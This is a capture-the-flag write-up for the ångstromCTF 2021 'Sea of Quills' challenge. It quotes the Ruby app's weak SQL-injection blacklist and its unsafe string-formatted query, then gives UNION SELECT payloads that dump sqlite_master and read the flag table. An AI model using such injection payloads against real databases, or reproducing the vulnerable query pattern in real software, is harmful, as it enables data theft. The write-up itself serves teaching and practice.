Rating:

# Sea of Quills

## Description

Come check out our [finest selection of quills](https://seaofquills.2021.chall.actf.co/)!

[app.rb](app.rb)

## Solution

First of all let's analyze the code, we have 3 interesting part:

Some characters are blacklisted

ruby
blacklist = ["-", "/", ";", "'", "\""]

blacklist.each { |word|
if cols.include? word
return "beep boop sqli detected!"
end
}


Field lim and off must be numeric

ruby
if !/^[0-9]+$/.match?(lim) || !/^[0-9]+$/.match?(off)
return "bad, no quills for you!"
end


There is also a cols field
ruby
@row = db.execute("select %s from quills limit %s offset %s" % [cols, lim, off])


Given this information we probably need to do some SQL injection using the cols field

In the /quills page we cannot see the cols field, but by analyzing and edit the HTML code we can remove the hidden tag

![](img1.png)
![](img2.png)

Now we can start with the SQL injection (lim=100, off=0)

First things first, we need to understand where we can find the flag and we can do it by see which table are present in the DB

SQL
name FROM sqlite_master UNION SELECT url


![](img3.png)

There is a flagtable, so let's try to get the flag now

SQL
flag FROM flagtable UNION SELECT url


![](img4.png)

#### **FLAG >>** actf{and_i_was_doing_fine_but_as_you_came_in_i_watch_my_regex_rewrite_f53d98be5199ab7ff81668df}

Original writeup (https://github.com/K1nd4SUS/CTF-Writeups/tree/main/%C3%A5ngstromCTF_2021/Sea%20of%20Quills).